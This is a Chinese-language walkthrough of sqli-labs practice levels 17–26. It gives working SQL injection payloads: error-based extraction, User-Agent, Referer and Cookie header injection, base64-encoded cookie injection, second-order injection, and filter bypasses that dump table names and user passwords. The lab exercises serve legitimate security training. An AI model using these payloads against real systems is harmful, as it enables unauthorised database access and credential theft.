sqli-labs 17-26

17.

进入页面，可以看到是一个修改密码的页面

可以尝试用户名为admin，在密码位置进行注入，尝试 1'

得到帐密由单引号包裹

尝试报错注入

爆数据库  

1' and (extractvalue(1,concat(0x5c,database(),0x5c)))#

爆表名   

1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#

爆字段名    

1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#

爆数据     

1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin') b) ,0x5c)))#

18.

进入后是一个登录页面

尝试之后发现不论输入单引号、双引号、恒等式还是堆叠注入，显示页面都相同

尝试登录admin，发现user agent

我们便可以利用user agent注入 

爆数据库名   

1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) or '

之后便可依次爆出数据

爆表名

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),0x7e),1)#

爆列名

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'),0x7e),1)#

爆数据

1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)#

19.

正常登录得到

页面回显出referer，边可利用referer注入，之后与18题相同

20.

通过登录发现回显cookie，我们便可以通过cookie回显

输入 

uname=1' union select 1,2,3--+

可以看到页面正常回显，之后便可正常注入

1. uname=1' union select 1,2,3--+
2. uname=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
3. uname=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

21.

正常登入后，发现cookie回显，但是和上一题回显不同，本题明显是经过编码了

那么我们在进行注入时，将我们的sql语句也进行编码就可以正常执行

进行Base64编码：

') union select 1,2,database() #

可以成功爆出数据，之后便和之前解题步骤相同了

22.

发现正常登录后和21题页面相同

尝试与21题相同的注入发现无效，尝试输入双引号

改为双引号后编码注入，注入出数据，之后的步骤就与21题相同了

23.

来到第23题，发现又回到了之前的样式，需要提交一个id

尝试注入一个单引号，发现id由单引号包裹

尝试爆出数据库   

1' and updatexml(1,concat(0x7e,database(),0x7e),1)  ；%00

需要注意 # 号被过滤了，可以使用 ;%00 代替

之后就按照正常的注入流程注入即可；

24.

来到24题，我们可以看到一个带有注册和忘记密码的登录页面

本题可以使用二次注入

我们可以先注册一个 admin'# 的账号，密码为1234567，这一步主要是为了将可能导致sql 注入的字符先存入到数据库中

之后登录该账号修改密码，再修改密码时，由于单引号进行闭合，井号注释了之后的代码，我们修改的就是admin的密码之后登录admin账号即可

25.

过滤了and和or，这里我们可以通过空格代替，另外像password这种带有or的单词，我们可以利用双写绕过 ：passwoorrd

之后的注入过程就不再赘述了

25a.

这一关呢与25关相同，只是它的报错是固定的，并且这一关是整数注入，不需要闭合

26.

二十六题题目显示过滤空格

单引号包裹

经过测试发现and和or还有#也被过滤了

这里我们可以用双竖线 || 代替and，用 %00 代替#

?id=1'||(updatexml(1,concat(0x7e,database(),0x7e),1));%00

之后便可以正常注入了